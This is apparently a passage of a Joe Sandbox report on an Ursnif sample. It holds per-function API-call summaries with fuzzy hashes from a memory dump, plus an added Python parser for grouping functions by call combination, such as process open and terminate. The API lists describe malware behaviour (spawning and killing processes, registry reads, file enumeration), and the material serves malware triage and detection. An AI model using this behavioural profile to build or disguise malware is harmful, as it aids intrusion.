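Matching on the function's own calls only is deliberate: the report repeats a subcall's API list under every caller (the 0348508C temp-file helper appears under several functions above), so rules that included subcall lines would fire once per caller rather than once per behaviour. The same parser can be pointed at the full report text to tally which functions carry which sequences.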

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetLastError.KERNEL32(?,?,?,00001000,?,0349A2F4,76CDF750), ref: 0348D38B
                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,0349A2F4,76CDF750), ref: 0348D410
                                • CloseHandle.KERNEL32(00000000,?,0349A2F4,76CDF750), ref: 0348D42A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000,?,0349A2F4,76CDF750), ref: 0348D45F
                                  • Part of subcall function 0347D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,03475546), ref: 0347D6C0
                                • WaitForSingleObject.KERNEL32(?,00000064,?,0349A2F4,76CDF750), ref: 0348D4E1
                                • CloseHandle.KERNEL32(F0FFC983,?,0349A2F4,76CDF750), ref: 0348D508
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                • String ID:
                                • API String ID: 3115907006-0
                                • Opcode ID: a0380e38f77715c4d8a2b111704ec95781ac27968ea055fbfac1dcee479fefb4
                                • Instruction ID: 8567e228bd8bfff3c8ebd21597b4f291450a48f0636902a32d75fb0966593914
                                • Opcode Fuzzy Hash: a0380e38f77715c4d8a2b111704ec95781ac27968ea055fbfac1dcee479fefb4
                                • Instruction Fuzzy Hash: 3F813B71D01219EFDF11EF99C984AAEFBB5FF09710F24445AE805AF294C730A941CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • FileTimeToLocalFileTime.KERNEL32(00000000,03482702), ref: 0348B2DA
                                • FileTimeToSystemTime.KERNEL32(03482702,?), ref: 0348B2E8
                                • lstrlenW.KERNEL32(00000010), ref: 0348B2F8
                                • lstrlenW.KERNEL32(00000218), ref: 0348B304
                                • FileTimeToLocalFileTime.KERNEL32(00000008,03482702), ref: 0348B3F1
                                • FileTimeToSystemTime.KERNEL32(03482702,?), ref: 0348B3FF
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                • String ID:
                                • API String ID: 1122361434-0
                                • Opcode ID: 138353d309bb4d4e6e78f2dcf68eb0e22a677e2a78adc01fbb806a1e98150833
                                • Instruction ID: d58c3384ef5f79f9c0766cabaa5c4474c7d319c3242dd7e466b9b178610df5e0
                                • Opcode Fuzzy Hash: 138353d309bb4d4e6e78f2dcf68eb0e22a677e2a78adc01fbb806a1e98150833
                                • Instruction Fuzzy Hash: F0710C7190021AAFCB51EFA9C884AEEB7FCFF09204F14446BE505EB241E774DA45CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlImageNtHeader.NTDLL(?), ref: 0347E428
                                  • Part of subcall function 03487A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0347E448,?), ref: 03487A6A
                                  • Part of subcall function 03487A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03487A7C
                                  • Part of subcall function 03487A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487A99
                                  • Part of subcall function 03487A3E: lstrlenW.KERNEL32(00000000,?,?,0347E448,?), ref: 03487AA5
                                  • Part of subcall function 03487A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0347E448,?), ref: 03487AB9
                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 0347E460
                                • CloseHandle.KERNEL32(?), ref: 0347E46E
                                • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0347E547
                                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0347E556
                                • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0347E569
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                • String ID:
                                • API String ID: 1719504581-0
                                • Opcode ID: 1a01029ed97f8f356c3805b93da3c7f8ba204a34774dc9c9826d3a8abce31a88
                                • Instruction ID: 6019bb0633ffb5e15d6c582f7b94b57db4e2efa6071a1560eb6c83414c8efa84
                                • Opcode Fuzzy Hash: 1a01029ed97f8f356c3805b93da3c7f8ba204a34774dc9c9826d3a8abce31a88
                                • Instruction Fuzzy Hash: DE41E635500209AFDB21EF95D885EDEBBB9EF14740F18429BE904AF314E730DA95CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,?), ref: 0348D237
                                • GetLastError.KERNEL32 ref: 0348D25D
                                • SetEvent.KERNEL32(00000000), ref: 0348D270
                                • GetModuleHandleA.KERNEL32(00000000), ref: 0348D2B9
                                • memset.NTDLL ref: 0348D2CE
                                • RtlExitUserThread.NTDLL(?), ref: 0348D303
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                • String ID:
                                • API String ID: 3978817377-0
                                • Opcode ID: f672440ce7aafdb7a7e0c16764035229935ecc9cc4bb08eb5b73618562eb860c
                                • Instruction ID: ba84412574b9c83a6d3440b958fc80301df5060afd81c293eeee312ebe2d87a5
                                • Opcode Fuzzy Hash: f672440ce7aafdb7a7e0c16764035229935ecc9cc4bb08eb5b73618562eb860c
                                • Instruction Fuzzy Hash: 77414D71D01604AFCB21EFA9DC888AFB7FCEF86611764465AE806EA244D730D945CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a28ca8ca759256b25ce661e32423a770737db38571f43d7d863ea1f58997ba5f
                                • Instruction ID: 1e17ff81476f7867d0b67995518a3138f18076d0dbf86d430c689bb0769431a7
                                • Opcode Fuzzy Hash: a28ca8ca759256b25ce661e32423a770737db38571f43d7d863ea1f58997ba5f
                                • Instruction Fuzzy Hash: 4941E171900700DFC720FF258C8892FBBE8FB86320B144A6FE66ADE280D7709441CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0347AE7C: lstrlen.KERNEL32(0347E448,00000000,00000000,?,?,03487A5B,?,?,?,?,0347E448,?), ref: 0347AE8B
                                  • Part of subcall function 0347AE7C: mbstowcs.NTDLL ref: 0347AEA7
                                • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EB0D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0348BB1D
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0348BB29
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BB71
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BB8C
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(?), ref: 0348BBCC
                                  • Part of subcall function 0348BAD1: memset.NTDLL ref: 0348BBEF
                                  • Part of subcall function 0348BAD1: wcscpy.NTDLL ref: 0348BC01
                                • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0347EB2E
                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EB5A
                                  • Part of subcall function 0348BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                  • Part of subcall function 0348BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                  • Part of subcall function 0348BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                  • Part of subcall function 0348BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                  • Part of subcall function 0348BAD1: FindClose.KERNEL32(?), ref: 0348BCB9
                                  • Part of subcall function 0348BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                  • Part of subcall function 0348BAD1: lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0347EB77
                                • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0347EB98
                                • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0347EBAD
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                • String ID:
                                • API String ID: 2670873185-0
                                • Opcode ID: f1f60b406494f0d53e44d405a9dbd91c11730c4d86831c9b27a7b13a5c3383b1
                                • Instruction ID: 37d0c84ebe020220cf62b8845cef8a1d81ee257386c2eb897f0f2d2f880f8cfe
                                • Opcode Fuzzy Hash: f1f60b406494f0d53e44d405a9dbd91c11730c4d86831c9b27a7b13a5c3383b1
                                • Instruction Fuzzy Hash: 70315E72408305AFCB11EF65C8888AFBFEDFB98254F140A6FF585AB210D731D9458B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(?,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005,?,00000000), ref: 0348EFBB
                                • lstrlen.KERNEL32(00000000,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005), ref: 0348EFD1
                                • lstrlen.KERNEL32(?,00000104,03493A4E,00000000,?,?,03489BAD,?,00000005), ref: 0348EFE6
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0348F04B
                                • _snprintf.NTDLL ref: 0348F071
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0348F090
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFree_snprintf
                                • String ID:
                                • API String ID: 3180502281-0
                                • Opcode ID: b03ac100d8c7f2cd823bd796182fcc1658f827da652acb1f96592c1f7ce9bf30
                                • Instruction ID: 8f3279f904f5c3c15fe4bdf976e017a98efa4abfb3f873fb0cbae1812cb46281
                                • Opcode Fuzzy Hash: b03ac100d8c7f2cd823bd796182fcc1658f827da652acb1f96592c1f7ce9bf30
                                • Instruction Fuzzy Hash: BF316B32900218FFDF21EF65DC848AF7BEAFB49280B158427FA04AF210D3719D559B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                • CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                • GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                • String ID:
                                • API String ID: 1835239314-0
                                • Opcode ID: fe7fc1e34af700208776be236f803af2893cea282bc25b2ea011d0a3661ce253
                                • Instruction ID: e3e4ed66a8323452e0da55a24bc4ef3e6760ddc47f440479813ed1e68dbab98d
                                • Opcode Fuzzy Hash: fe7fc1e34af700208776be236f803af2893cea282bc25b2ea011d0a3661ce253
                                • Instruction Fuzzy Hash: 50311C71D00248EFCF21EF95CA89CEFBBB9EB99351B288457F505AA300D3305A44CB65
                                Uniqueness

                                Uniqueness Score: -1.00%
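The function summaries above are emitted by the Joe Sandbox IDA plugin in a fixed plain-text layout: a block opens with "APIs", lists one call per bullet (nested "Part of subcall function" bullets for calls made inside a callee), then carries the dump source and the similarity keys (API ID, API String ID, opcode and instruction fuzzy hashes) and the uniqueness score. When triaging a dump with hundreds of such blocks it is useful to turn them into records that can be searched by API combination (for example every function that both opens and terminates a process) or exported by fuzzy hash for matching against other Ursnif samples. The parser below is an added example, not code from the Joe Sandbox report or from the plugin; it assumes only the layout visible on this page, and the embedded input is a constructed excerpt of two blocks copied from the report so the script runs offline.

```python
"""Parse Joe Sandbox 'APIs' function-summary blocks into structured records.

Added example, not part of the Joe Sandbox report or its tooling. It assumes
the plain-text layout seen on this page: a block starts with the line 'APIs',
lists one call per bullet, and is followed by key/value lines such as
'API ID:' and 'Instruction Fuzzy Hash:'. SAMPLE_REPORT is a constructed
excerpt of two blocks from the report, embedded so the script runs offline.
"""
import json
import re

SAMPLE_REPORT = """\
APIs
• OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0348C917
• _strupr.NTDLL ref: 0348C952
• lstrlen.KERNEL32(00000000), ref: 0348C95A
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0348C999
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0348C9A0
• GetLastError.KERNEL32 ref: 0348C9A8
Memory Dump Source
• Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
Yara matches
Similarity
• API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
• String ID:
• API String ID: 110452925-0
• Instruction Fuzzy Hash: 3411C172500204EFDB12BB759C88DAFB7ECAB99650B240497F906EE148DA308C868F74
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
• CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?), ref: 03491F02
• SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0347AA1D
Memory Dump Source
• Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
Similarity
• API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
• String ID:
• API String ID: 1835239314-0
• Instruction Fuzzy Hash: 50311C71D00248EFCF21EF95CA89CEFBBB9EB99351B288457F505AA300D3305A44CB65
Uniqueness

Uniqueness Score: -1.00%
"""

# One API call line. The argument list is optional: calls without visible
# parameters are printed as 'GetLastError.KERNEL32 ref: ...' with no parentheses.
_CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# 'Key: value' lines (API ID, String ID, fuzzy hashes, Uniqueness Score, ...).
_KV_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]+?):\s*(?P<value>.*)$")


def _strip_bullet(line):
    """Drop indentation and the leading bullet the report puts on each entry."""
    return line.strip().lstrip("•").strip()


def parse_blocks(text):
    """Split report text into function blocks; each has 'calls' and 'meta'."""
    blocks, current, in_calls = [], None, False
    for raw in text.splitlines():
        line = _strip_bullet(raw)
        if line == "APIs":
            current = {"calls": [], "meta": {}}
            blocks.append(current)
            in_calls = True
            continue
        if current is None or not line:
            continue
        m = _CALL_RE.match(line) if in_calls else None
        if m:
            args = m.group("args")
            current["calls"].append({
                "name": m.group("name"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref"),
                # Set when the call is made inside a callee of this function.
                "subcall_of": m.group("parent"),
            })
            continue
        if line == "Memory Dump Source":
            in_calls = False  # everything after this is metadata
        kv = _KV_RE.match(line)
        if kv:
            current["meta"][kv.group("key")] = kv.group("value")
    return blocks


def direct_calls(block):
    """Names of the calls the function makes itself, in address order."""
    return [c["name"] for c in block["calls"] if c["subcall_of"] is None]


def find_blocks_calling(blocks, names):
    """Instruction fuzzy hashes of blocks whose calls (direct or nested) cover `names`."""
    wanted = set(names)
    return [b["meta"].get("Instruction Fuzzy Hash")
            for b in blocks
            if wanted <= {c["name"] for c in b["calls"]}]


if __name__ == "__main__":
    parsed = parse_blocks(SAMPLE_REPORT)
    print(json.dumps(parsed, indent=1))
    print(find_blocks_calling(parsed, ["OpenProcess", "TerminateProcess"]))
```

The module attributed to a call (KERNEL32 versus ADVAPI32 for RegQueryValueExA, for instance) is recorded as the plugin printed it rather than normalised, since it reflects where the sandbox resolved the export and may differ between blocks of the same dump.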

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,03487C35,00000000,?,?,?), ref: 0347F531
                                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,03487C35,00000000,?,?,?), ref: 0347F542
                                  • Part of subcall function 03471F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,03483D4E,00000000,?,?,00000000,00000001), ref: 03471F21
                                  • Part of subcall function 03471F0F: StrChrA.SHLWAPI(?,0000000D,?,03483D4E,00000000,?,?,00000000,00000001), ref: 03471F59
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0347F582
                                • memcpy.NTDLL(00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5AF
                                • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5BE
                                • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5D0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: e9837550c2a99f9859efeac58e9da11b33562e2077b37bce4b6b75ee9945aa45
                                • Instruction ID: 7e6a69208f907c9cb845ac5914e0147d4f80f2222b12e8b34aad4b78227381f1
                                • Opcode Fuzzy Hash: e9837550c2a99f9859efeac58e9da11b33562e2077b37bce4b6b75ee9945aa45
                                • Instruction Fuzzy Hash: F6219072500209BFDB11DF99DC85F9ABBECEF08284F054153F904EF252DA70E9458BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 034904D9
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 034904EA
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 03490505
                                • GetLastError.KERNEL32 ref: 0349051B
                                • HeapFree.KERNEL32(00000000,?), ref: 0349052D
                                • HeapFree.KERNEL32(00000000,?), ref: 03490542
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                • String ID:
                                • API String ID: 1822509305-0
                                • Opcode ID: 96ce6c6c775ee1fb2d34c6101fe6283168238b18a5705f8cc7766397a55c34f8
                                • Instruction ID: 13b76045a5926682319df554b94e51a8e4f2919b1f3cd5cbd4b261c056ce43b2
                                • Opcode Fuzzy Hash: 96ce6c6c775ee1fb2d34c6101fe6283168238b18a5705f8cc7766397a55c34f8
                                • Instruction Fuzzy Hash: 09115EB6901028BBDF22AF96DC09CEF7FBEEF562A0B110053F505E9114D6314A55EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0348C917
                                • _strupr.NTDLL ref: 0348C952
                                • lstrlen.KERNEL32(00000000), ref: 0348C95A
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0348C999
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0348C9A0
                                • GetLastError.KERNEL32 ref: 0348C9A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                • String ID:
                                • API String ID: 110452925-0
                                • Opcode ID: b5a92bf4df19419567e21e61f868cb4239fdb55554e7c31e99d6fcf3c5d226f4
                                • Instruction ID: 0cf6f7b458e0f264ab0c836b8ebb879baa4150ef77e36af1808e37e2323bcd14
                                • Opcode Fuzzy Hash: b5a92bf4df19419567e21e61f868cb4239fdb55554e7c31e99d6fcf3c5d226f4
                                • Instruction Fuzzy Hash: 3411C172500204EFDB12BB759C88DAFB7ECAB99650B240497F906EE148DA308C868F74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0348B567
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0348B595
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348B5A7
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0348B5CC
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348B5E7
                                • RegCloseKey.ADVAPI32(?), ref: 0348B5F1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                • String ID:
                                • API String ID: 170146033-0
                                • Opcode ID: 7cc064c5a9c2c5a4e75a332e067c230241a74cacb5b5e36c5bc47ac470a6ef6c
                                • Instruction ID: 74302fd5da71316b31977f81ee7c5888298d761f3a735ba4586be43b9debb17a
                                • Opcode Fuzzy Hash: 7cc064c5a9c2c5a4e75a332e067c230241a74cacb5b5e36c5bc47ac470a6ef6c
                                • Instruction Fuzzy Hash: 36111776900108FFDB11EF99DC84CEEBBFDEB49204B1440A7E901EA218E3315A15DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5F8
                                • lstrlen.KERNEL32(?,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5FF
                                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0347A611
                                • _snprintf.NTDLL ref: 0347A637
                                  • Part of subcall function 0348C01F: memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0348C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                  • Part of subcall function 0348C01F: wcstombs.NTDLL ref: 0348C077
                                  • Part of subcall function 0348C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                  • Part of subcall function 0348C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C131
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C136
                                • _snprintf.NTDLL ref: 0347A66B
                                  • Part of subcall function 0348C01F: GetLastError.KERNEL32 ref: 0348C102
                                  • Part of subcall function 0348C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0348C122
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0347A688
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                • String ID:
                                • API String ID: 1481739438-0
                                • Opcode ID: 570ccbc595d6ccf63b59ec1bd0e753a25d5a6c015416b2e28333683a99fdd9a3
                                • Instruction ID: 0660a35877a826f7f1f5461b80c9d84f4bb1602288402540ce2a294882a26e16
                                • Opcode Fuzzy Hash: 570ccbc595d6ccf63b59ec1bd0e753a25d5a6c015416b2e28333683a99fdd9a3
                                • Instruction Fuzzy Hash: 2411DDB2100218BFCF12AF94DC85D9E7FADEB093A0B164157FE09AF211D631DA10DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(0347261E,00000000,00000000,00000008,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F7A7
                                • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0348F7BA
                                • lstrcpy.KERNEL32(00000008,0347261E), ref: 0348F7DC
                                • GetLastError.KERNEL32(03474A0A,00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F805
                                • HeapFree.KERNEL32(00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F81D
                                • CloseHandle.KERNEL32(00000000,03474A0A,00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F826
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                • String ID:
                                • API String ID: 2860611006-0
                                • Opcode ID: d11b61ae3cfb3c3354da4fefffa441e384bc984237e97691067459ded7293070
